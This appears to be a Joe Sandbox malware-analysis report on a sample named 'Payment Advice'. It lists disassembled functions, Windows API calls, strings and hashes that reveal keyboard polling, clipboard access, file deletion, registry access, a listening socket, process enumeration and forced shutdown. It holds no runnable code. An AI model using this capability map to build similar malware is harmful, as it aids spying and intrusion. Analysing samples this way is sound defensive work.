Part of subcall function 005BAC56: HeapAlloc.KERNEL32(00000000,?,005BA6B5,?), ref: 005BAC69
Part of subcall function 005BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005BA6B5,?), ref: 005BAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005BA6D0
_memset.LIBCMT ref: 005BA6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005BA704
GetLengthSid.ADVAPI32(?), ref: 005BA715
GetAce.ADVAPI32(?,00000000,?), ref: 005BA752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005BA76E
GetLengthSid.ADVAPI32(?), ref: 005BA78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005BA79A
HeapAlloc.KERNEL32(00000000), ref: 005BA7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 005BA7C2
CopySid.ADVAPI32(00000000), ref: 005BA7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005BA7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005BA820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 005BA834

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 390e8905a8712efd5de105bb770ad4b95f76b7ca4a05ba7df97ddb304fdf6381
Instruction ID: 2de82fccb916a0cc8f3a48edf3b1717020988be822e494af2d0b2b3e21f6c44e
Opcode Fuzzy Hash: 390e8905a8712efd5de105bb770ad4b95f76b7ca4a05ba7df97ddb304fdf6381
Instruction Fuzzy Hash: 95512A7190020ABBDF149FA5DC49AEFBFB9FF44300F048169F915A7291DB35AA05CB61

Function 00586F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

NO_AUTO_POSSESS), xrefs: 00602CB0
UTF16), xrefs: 00602C56
ANYCRLF), xrefs: 00602E7D
BSR_UNICODE), xrefs: 00602EBA
LIMIT_RECURSION=, xrefs: 00602D7E
UTF), xrefs: 00602C7C
bbb b, xrefs: 00587096, 0058709C
BSR_ANYCRLF), xrefs: 00602EA0
b, xrefs: 00586F77
CR), xrefs: 00602E09
ANY), xrefs: 00602E60
NO_START_OPT), xrefs: 00602CD1
CRLF), xrefs: 00602E43
LF), xrefs: 00602E26
LIMIT_MATCH=, xrefs: 00602CF2
UCP), xrefs: 00602C8F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID: b$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$bbb b
API String ID: 0-1501720845
Opcode ID: 4cd5f3d7b4830a33985210a84ef95fd1a35faa1303f185a6eceec17453bf78b3
Instruction ID: bb4de31696af3fe65b0c72d52e9f010ba83b66c7fce086064f0460b26a0f456a
Opcode Fuzzy Hash: 4cd5f3d7b4830a33985210a84ef95fd1a35faa1303f185a6eceec17453bf78b3
Instruction Fuzzy Hash: 09727171E4422A9BDF18DF58C8547AEBBB6FF48310F24456AE805EB381DB709E41DB90

Function 005C63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005C5FA6,?), ref: 005C6ED8

Part of subcall function 005C72CB: GetFileAttributesW.KERNEL32(?,005C6019), ref: 005C72CC

_wcscat.LIBCMT ref: 005C6441
__wsplitpath.LIBCMT ref: 005C645F
FindFirstFileW.KERNEL32(?,?), ref: 005C6474
_wcscpy.LIBCMT ref: 005C64A3
_wcscat.LIBCMT ref: 005C64B8
_wcscat.LIBCMT ref: 005C64CA
DeleteFileW.KERNEL32(?), ref: 005C64DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 005C64EB
FindClose.KERNEL32(00000000), ref: 005C6506

Strings

\*.*, xrefs: 005C643B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 763457a5092fff7c28a382d955c09e5ac925888e1a5124e4bb3047bd52cdf37a
Instruction ID: d8a4c9a5dab37576989bd15e28efc361ed1ae97ef393b8fa50902adb4fb1222b
Opcode Fuzzy Hash: 763457a5092fff7c28a382d955c09e5ac925888e1a5124e4bb3047bd52cdf37a
Instruction Fuzzy Hash: 103191B24083859EC721DBE48889EDFBBDCBB96310F404A1EF5D9C3141EA35D60987A7

Function 005E31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005E2BB5,?,?), ref: 005E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E328E

Part of subcall function 0058936C: __swprintf.LIBCMT ref: 005893AB
Part of subcall function 0058936C: __itow.LIBCMT ref: 005893DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 005E332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005E33C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 005E3604
RegCloseKey.ADVAPI32(00000000), ref: 005E3611

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 127f030809cfcbe6d434dc74c5d9e5892c312c6ea71271dab5fa5c1b85334c0d
Instruction ID: eaf8f95be04178cc4a7d3eaaa9ca776e8ceeb1af1db7cd50f23e951424bcbaae
Opcode Fuzzy Hash: 127f030809cfcbe6d434dc74c5d9e5892c312c6ea71271dab5fa5c1b85334c0d
Instruction Fuzzy Hash: 73E15C31604251AFCB15DF29C899E2ABBE9FF88714F04895DF88AD72A1DB30ED05CB51

Function 005C2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 005C2B5F
GetAsyncKeyState.USER32(000000A0), ref: 005C2BE0
GetKeyState.USER32(000000A0), ref: 005C2BFB
GetAsyncKeyState.USER32(000000A1), ref: 005C2C15
GetKeyState.USER32(000000A1), ref: 005C2C2A
GetAsyncKeyState.USER32(00000011), ref: 005C2C42
GetKeyState.USER32(00000011), ref: 005C2C54
GetAsyncKeyState.USER32(00000012), ref: 005C2C6C
GetKeyState.USER32(00000012), ref: 005C2C7E
GetAsyncKeyState.USER32(0000005B), ref: 005C2C96
GetKeyState.USER32(0000005B), ref: 005C2CA8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 52d239045268e5c8dc4460ec7cbe22a10f959dda4ec2211ce749f31825ea0d80
Instruction ID: c462ebbac64b7215f69b96e0cf8e3205d0be69d3b366c4b9a14c84a4dd61a0a4
Opcode Fuzzy Hash: 52d239045268e5c8dc4460ec7cbe22a10f959dda4ec2211ce749f31825ea0d80
Instruction Fuzzy Hash: 0E41A3345047C97DFF359BE48804BAABEA1BB11348F04815DD9C6566C2EBE49DC8C7A2

Function 005D6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 005D6D2E
EmptyClipboard.USER32 ref: 005D6D34
GlobalAlloc.KERNEL32(00000002,?), ref: 005D6D49
CloseClipboard.USER32 ref: 005D6DE8

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 14a9539aeb6dd8399838835c225bf4e67f662a7f6a66699fe56bbfaa51ee5093
Instruction ID: 2cb2a3c44f9cdb1348fd2e556c91bd6328ca3f1688cd9da61e9ac8f86b223473
Opcode Fuzzy Hash: 14a9539aeb6dd8399838835c225bf4e67f662a7f6a66699fe56bbfaa51ee5093
Instruction Fuzzy Hash: 91218131340211AFDB11AFA8EC49B2E7BAAFF44711F04951AF94ADB2A1DB31ED018F55

Function 005DC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 005B9ABF: CLSIDFromProgID.OLE32 ref: 005B9ADC
Part of subcall function 005B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 005B9AF7
Part of subcall function 005B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 005B9B05
Part of subcall function 005B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 005B9B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 005DC235
_memset.LIBCMT ref: 005DC242
_memset.LIBCMT ref: 005DC360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 005DC38C
CoTaskMemFree.OLE32(?), ref: 005DC397

Strings

NULL Pointer assignment, xrefs: 005DC3E5

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 96b8eaf493d5e9266a0a8b6c4f6647aed38f14ca20d16fdba979477578b7b034
Instruction ID: 1fe4d26940c4bbeb9761c7fd2c16217690793788ceded4d18de812f3624e701b
Opcode Fuzzy Hash: 96b8eaf493d5e9266a0a8b6c4f6647aed38f14ca20d16fdba979477578b7b034
Instruction Fuzzy Hash: B1911971D0021AABDB20DFA4DC95EDEBFB9BF44710F10815AF915A7281DB70AA45CFA0

Function 005C79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 005BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005BB180
Part of subcall function 005BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005BB1AD
Part of subcall function 005BB134: GetLastError.KERNEL32 ref: 005BB1BA

ExitWindowsEx.USER32(?,00000000), ref: 005C7A0F

Strings

@, xrefs: 005C7A02
SeShutdownPrivilege, xrefs: 005C79DD
, xrefs: 005C79FD

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: ab0ef16d405483aa13496678fabc4e307d3ed73cc935e2bbcc2b9c8ab8df9435
Instruction ID: 0eb556289bc1dbc7b44cb896ca85464ba6a55ce7f1fc4ff48ab7d878963c7d33
Opcode Fuzzy Hash: ab0ef16d405483aa13496678fabc4e307d3ed73cc935e2bbcc2b9c8ab8df9435
Instruction Fuzzy Hash: 8501AC7165821A6FF72C56F4DC5AFBF7A58F708740F14191CBD53A24D1D5A19E0085A0

Function 005D8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 005D8CA8
WSAGetLastError.WSOCK32(00000000), ref: 005D8CB7
bind.WSOCK32(00000000,?,00000010), ref: 005D8CD3
listen.WSOCK32(00000000,00000005), ref: 005D8CE2
WSAGetLastError.WSOCK32(00000000), ref: 005D8CFC
closesocket.WSOCK32(00000000,00000000), ref: 005D8D10

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 6a55bb6fc05db3ba942ee934f5aeb8044190a9555417ff6072833a6333776f67
Instruction ID: 56628385a99a1defa5bd491b7805f65d74da113dd228d6710453970627a21427
Opcode Fuzzy Hash: 6a55bb6fc05db3ba942ee934f5aeb8044190a9555417ff6072833a6333776f67
Instruction Fuzzy Hash: 63218531601101AFCB20EF68CD49B7E7BA9FF88714F14455AF956AB3D1CB70AD418B51

Function 005C6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005C6554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 005C6564
Process32NextW.KERNEL32(00000000,0000022C), ref: 005C6583
__wsplitpath.LIBCMT ref: 005C65A7
_wcscat.LIBCMT ref: 005C65BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 005C65F9

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 500756179cb9e4297dcc84a271f5646767f01afa355bcff9daeacf55fece13c3
Instruction ID: cdd6494637a6cbf5e06e350a7fe53a25cdac9b2978532e59de2d19f9c09f031f
Opcode Fuzzy Hash: 500756179cb9e4297dcc84a271f5646767f01afa355bcff9daeacf55fece13c3
Instruction Fuzzy Hash: D9214171900219AFDB10ABE4CD89FDEBBBDBB49300F5004A9E505E7141EB759F85CB61

Function 00589B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON

Download Yara Rule

Strings

b, xrefs: 00589CF3
VUUU, xrefs: 00589E95
VUUU, xrefs: 00589EA7
VUUU, xrefs: 0060BE14
VUUU, xrefs: 00589ED4
ERCP, xrefs: 00589C32

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU$b
API String ID: 0-1013902317
Opcode ID: a05712a7519bb6d15b7ecdb3499b2d619b56257c5194ff0c7c73f00146d8b55e
Instruction ID: 000712c8b8d1e0cab8bd09a4cd4a70bcc2c69af9d94d4b0247429c61cf4a03ea
Opcode Fuzzy Hash: a05712a7519bb6d15b7ecdb3499b2d619b56257c5194ff0c7c73f00146d8b55e
Instruction Fuzzy Hash: 5D925D71A0021ACBEF28DF58C8447FEBBB2BB54314F14869AED16B7280D7719D81DB91

Function 005C13CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 005C13DC

Strings

(, xrefs: 005C1422
<2c, xrefs: 005C16FA
|, xrefs: 005C140C
,2c, xrefs: 005C16B1

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: lstrlen
String ID: ($,2c$<2c$|
API String ID: 1659193697-1209631838
Opcode ID: ccf349956788d5056767d6f42d9bf835799ecd086a20200179a34ba660741cf3
Instruction ID: 4b82ccdd25224e97677fee64ecfde4b1b8f5432a404824913942cb90251e89d7
Opcode Fuzzy Hash: ccf349956788d5056767d6f42d9bf835799ecd086a20200179a34ba660741cf3
Instruction Fuzzy Hash: 7F321775A00A059FCB28CF69C490E6ABBF0FF49310B15C56EE59ADB3A2D770E941CB44

Function 005D923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 005DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 005DA84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 005D9296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 005D92B9

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: a424563702273642fba918f80307659f06e059ad5feac00c048a74ff9b12247d
Instruction ID: ab660fffa3cdcd23f6f12d7fbd5238ec49f50cc635c071eb6447a56aea58d4f2
Opcode Fuzzy Hash: a424563702273642fba918f80307659f06e059ad5feac00c048a74ff9b12247d
Instruction Fuzzy Hash: AC41C170600201AFDB10AB68CC4AE7F7BEEFF84724F044949F956AB382DA749D018B91

Function 005CEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 005CEB8A
_wcscmp.LIBCMT ref: 005CEBBA
_wcscmp.LIBCMT ref: 005CEBCF
FindNextFileW.KERNEL32(00000000,?), ref: 005CEBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 005CEC0E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: c612375c6990219258a658e21b5b94d8c95af5c3a669b9abb2d943f8e6e6d8d8
Instruction ID: 6d939ac5071f29dab67e204cf0bfbe168ce81219143e8e155b94a1b52503921f
Opcode Fuzzy Hash: c612375c6990219258a658e21b5b94d8c95af5c3a669b9abb2d943f8e6e6d8d8
Instruction Fuzzy Hash: B3419D356006029FCB18DF68C895EAABBE4FF89324F10455DE95A8B3A1DB31ED40CF95

Function 005E8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 005E8160
IsWindowEnabled.USER32 ref: 005E816E
GetForegroundWindow.USER32(?,?,00000001), ref: 005E817B
IsIconic.USER32 ref: 005E8189
IsZoomed.USER32 ref: 005E8197

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 2cc286d088ad5d34ed70d3e4a665acaefafefa045c9133e8b708a0319f2be227
Instruction ID: c5129c6f320a7b1904a637616adc50e2a5e5388cc297d2eb5bd65c53ef39abc1
Opcode Fuzzy Hash: 2cc286d088ad5d34ed70d3e4a665acaefafefa045c9133e8b708a0319f2be227
Instruction Fuzzy Hash: D3118B31740251AFE7296F66DC48A7BBF99FF84760F050429F889D7241CF30A902C6A0

Function 0059E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0059E014,74DF0AE0,0059DEF1,0061DC38,?,?), ref: 0059E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0059E03E

Strings

GetNativeSystemInfo, xrefs: 0059E038
kernel32.dll, xrefs: 0059E027

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: ceca6a2d5030cfab101ed1d217bdca630ca57a9aa5040c4d92041a564ac56cd1
Instruction ID: 523c9c5f2f5c918c96ecb3bd86940e586a07e3f66fc5734cb9a0035c1f96821f
